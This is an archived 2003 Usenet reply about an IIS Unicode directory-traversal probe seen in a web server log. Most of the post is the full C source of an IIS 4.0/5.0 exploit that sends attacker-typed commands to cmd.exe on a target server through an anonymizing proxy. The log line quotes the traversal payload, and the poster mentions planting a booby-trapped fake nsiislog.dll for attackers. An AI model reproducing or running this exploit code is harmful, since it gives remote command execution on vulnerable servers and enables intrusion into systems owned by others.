Re: Is someone trying to hack my Web Host?

• Previous message: Adam Leinss: "Re: how can I block my collegue"
• In reply to: Randell D.: "Re: Is someone trying to hack my Web Host?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 12 Oct 2003 02:09:14 +0000

Randell D. wrote:
> <wilkinsb1971@yahoo.com> wrote in message
> news:a6785bda.0310061004.4a7c5dbe@posting.google.com...
>
>>I was looking through the raw log files to see who's visiting my
>>personal Web site and noticed this entry:
>>
>>63.198.115.243 - - [06/Oct/2003:08:08:39 -0700] "GET
>>/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
>>
>>Why would anyone be looking for cmd.exe? Is someone trying to hack my
>>host or my site? This wouldn't work anyway because my host uses
>>RedHat. I'm just curious as to why someone would be looking for
>>cmd.exe.

cmd.exe is like our /bin/sh, cmd.exe? dir is usuallly the first way
someone will test if the exploit is going to work. If I'm not mistaken,
it should dump a file list. There's one for nsiislog.dll too, I make a
copy of something and named it "nsiislog.dll" and even put it in a bogus
"scripts" directory. Any time anyone would GET /scripts/ on me, they'd
really "get" scripts!!

>>
>>Thanks,
>>Brian Wilkins
>
>
> I have a small Apache server and it gets hit by similar log entries every
> few minutes. Its got worse within the past month - previously it was twice
> an hour, now though it is as much as six to eight times an hour (sometimes
> more making me believe that some folks who have their machine switched off
> during the day switch on (and activate the worm) when surfing during the
> evening. Its a scary thought - but I'm glad I stuck with Unix/Linux and not
> microsoft years ago as I'd hate to think how I would manage with a microsoft
> web server at home connected to the net.
>
>

Mico$hit! the scorge of the 'Net!

THis is an older MS exploit, and recently I've gotten plastered with it.
I belive it to be a script, because there doesn't seem to be any
intelligence behind it. I.E., I just move my site from port 80 to SSL on
  443 and locked down 80, now they bounce off the firewall all day. The
worst thing is, it's not coming from one place. I'm pretty visible and
run a number of services, combine that with people that get pissed off
because of things I respond with on usenet and you can see I make a few
enemies. There's always some hoser trying to login to my anon server as
"root" or "test", most times it's just funny (and sad), so I first
thought "proxy-hopper", but now I don't think so. Too bad, cuz I woulda
owned that script-kiddie by now. I'm not sure if I belive in the "switch
on, all the worms starting at once " thing, I'd bet there's more to this
than we know right now. These days exploits are widely published, and
anyone that looks can get a sample. There's still lots of vulerable
MicroCrap servers still out there. I wish they'd just die off so that
this crap would stop. Here's what it looks like as a C code, I've seen
Perl too:

/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */
/* coded by zipo */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* this is the anonymous server used */
#define ANON "anon.free.anonymizer.com"
/* this are all the types of bugs */
#define BUG1_STR
"/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR
"/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* this is the IIS http server port */
#define HTTP_PORT 80
int main (int argc, char *argv[]) {
    struct sockaddr_in sin;
    struct hostent *he;
    char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN];
    int sck, i;
    if (argc < 3)
      bad_params (argv[0]);
    switch (atoi(argv[2])) {
     case 1:
       bug = BUG1_STR;
       break;
     case 2:
       bug = BUG2_STR;
       break;
     case 3:
       bug = BUG3_STR;
       break;
     case 4:
       bug = BUG4_STR;
       break;
     default:
       printf ("Number error\n");
       exit(1);
    }
    while (1) {
       printf ("bash# ");
       fgets (cmd, sizeof(cmd), stdin);
       cmd[strlen(cmd)-1] = '\0';
       if (strcmp(cmd, "exit")) {
                if (!strcmp(cmd, "clear")) {
            system("clear");
            continue;
         } else if (!strcmp(cmd, "")) {
            continue;
         } else if (!strcmp(cmd, "?")) {
            printf ("Just you need to type in the prompt the M$DOS command\n");
            printf ("to exit type \"exit\" :)\n");
            continue;
         }
         /* prepare the string to be sent */
         for (i=0;i<=strlen(cmd);i++) {
            if (cmd[i] == 0x20)
              cmd[i] = 0x2b;
         }
         sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
         /* get ip */
         if ((he = gethostbyname (ANON)) == NULL) {
            herror ("host error");
            exit (1);
         }
         /* setup port and other parameters */
         sin.sin_port = htons (HTTP_PORT);
         sin.sin_family = AF_INET;
         memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
         /* create a socket */
         if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) {
            perror ("socket() error");
            exit (1);
         }
         /* connect to the sucker */
         if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) {
            perror ("connect() error");
            exit (1);
         }
         /* send the beautifull string */
         write (sck, buffer, sizeof(buffer));
         /* recive all ! :) */
         read (sck, recbuffer, sizeof(recbuffer));
         /* and print it */
         recbuffer[strlen(recbuffer)-1]='\0';
         
printf("\033[0;7m-------------------------------------Received-----------------------------------\n");
         
printf("%s\n---------------------------------------Done-------------------------------------\n\033[7;0m",
recbuffer);
         /* close the socket ... not needed any more */
         close (sck);
         /* put zero's in the buffers */
         bzero (buffer, sizeof(buffer));
         bzero (recbuffer, sizeof(recbuffer));
       } else {
         /* you type "exit" cya :) */
         exit(0);
       }
    }
}
/* you miss a parameter :'-( */
int bad_params (char *prog_name) {
    fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name);
    fprintf
(stdout,"-------------------------------------------------------\n");
    fprintf (stdout, "<1> msadc\t");
    fprintf (stdout, "<2> scripts\t");
    fprintf (stdout, "<3> iisadmpwd\t");
    fprintf (stdout, "<4> /\n");
    fprintf
(stdout,"-------------------------------------------------------\n");
    exit (1);
}
/* EOF */

Depending on who codes them, sometimes they work, sometimes not. There's
  worms of course that use this too. Lots of variations. Maybe you will
move to https too, it doesn't go there (but could be directed there in
this above example). Anyone need their cert req. signed?! lol...

-- 
-=-=-=-=-=-=-=-=-=-=-=The New Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-=-=
- jayjwa     PGPKey OnSite / CA OnSite / Now w/SSL ONLY
4 Contact: jayjwa@HotSpam.com   4 All:GET/cgi-bin/ping-jay.cgi
4 Spammers: listme@listme.dsbl.org         4 Clowns: /dev/null
4 Script Kiddies: Anything in /scripts/
=-=-=-=-=-=-=-=Linux Tough.Powered By Slackware=-=-=-=-=-=-=-=

• Previous message: Adam Leinss: "Re: how can I block my collegue"
• In reply to: Randell D.: "Re: Is someone trying to hack my Web Host?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]